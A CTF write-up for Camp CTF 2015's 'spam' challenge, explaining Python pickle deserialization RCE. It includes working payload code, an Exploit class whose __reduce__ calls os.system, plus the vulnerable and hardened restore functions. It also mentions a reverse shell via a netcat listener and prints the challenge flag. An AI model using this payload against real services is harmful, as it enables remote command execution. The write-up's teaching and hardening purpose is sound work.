Camp CTF 2015 – spam

Description

CTF: Camp CTF 2015
Title: spam
Category: pwn
Points: 75
Location: nc challs.campctf.ccc.ac 10113
Description:
You have problems remembering all your different passwords?
Here is THE tool for you!

Solution

Basically, this service lets you list, add and delete entries, each of which pairs a password with the URL where that password is used.

We quickly identified the vulnerability: the service relies on pickle, the Python module for serialising and de-serialising object structures.

pickle is used in this service to save and restore backups. However, the de-serialised object structure is never validated when a backup is restored. The script expects a dict(), but we can send a different object instead: one whose unpickling executes an OS command (thanks to __reduce__, which lets a class tell pickle to reconstruct it by calling an arbitrary callable, typically os.system, with attacker-chosen arguments). Many exploits for pickle misuse are available, but we decided to use this one:

The result is:

This base64 string is then sent to the restore_backup() function, which decodes it, decompresses it and unpickles the serialised Exploit() class, running our command on the server in the process.
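The payload construction described above, together with the vulnerable restore path and a hardened one, as an added example that is not code from the original writeup or from the challenge service. It assumes the backup format is pickle, then zlib, then base64 (the page only says "decode, unzip and unpickle"), and the function names build_backup, restore_backup_vulnerable and restore_backup_hardened are chosen here for illustration. The reverse-shell command the author actually used is not reproduced on the page, so the demo runs `id` instead.

```python
import base64
import io
import os
import pickle
import zlib


class Exploit:
    """Object whose unpickling runs an OS command.

    pickle serialises this instance as "call os.system(cmd)" (the tuple
    returned by __reduce__); the call happens inside pickle.loads() on the
    victim, so the Exploit class itself never has to exist there.
    """

    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


def build_backup(obj):
    """Encode an object the way the service is assumed to expect a backup:
    pickle -> zlib -> base64 (format is an assumption, see lead-in)."""
    return base64.b64encode(zlib.compress(pickle.dumps(obj))).decode("ascii")


def restore_backup_vulnerable(blob):
    """The pattern the writeup describes: decoded bytes go straight into
    pickle.loads with no check on what comes out. A blob built from
    Exploit("...") runs the command here and returns os.system's status."""
    return pickle.loads(zlib.decompress(base64.b64decode(blob)))


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every GLOBAL / STACK_GLOBAL reference in the stream.

    A dict of strings needs no class lookup at all, so legitimate backups
    still load, while the os.system reference in the exploit is rejected
    before anything is called."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restore_backup_hardened(blob):
    """Decode like the vulnerable version, but unpickle with the restricted
    loader and verify the result really is the dict the script expects."""
    data = zlib.decompress(base64.b64decode(blob))
    obj = RestrictedUnpickler(io.BytesIO(data)).load()
    if not isinstance(obj, dict):
        raise ValueError("backup must be a dict of url -> password")
    return obj


if __name__ == "__main__":
    # Constructed sample backup: one URL/password entry.
    legit = {"https://example.org": "hunter2"}
    assert restore_backup_hardened(build_backup(legit)) == legit

    # Attacker side: the string you would paste into "restore backup".
    payload = build_backup(Exploit("id"))  # the real attack used a reverse shell
    print(payload)

    # Victim side: the unchecked restore executes `id`.
    restore_backup_vulnerable(payload)

    try:
        restore_backup_hardened(payload)
    except pickle.UnpicklingError as err:
        print("hardened restore rejected payload:", err)
```

The hardened loader is the minimum fix for this particular bug; the more robust answer is to not use pickle for untrusted input at all and store the URL/password dict as JSON, which cannot reference callables.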

Before “restoring” the backup, I started a netcat listener on port 10008 on Pacman’s server to catch the incoming connection. Once the connection was established, I listed the directory contents and then cat flag.txt:

 Flag: CAMP15_76b5fad40644ac0616b301454250c408
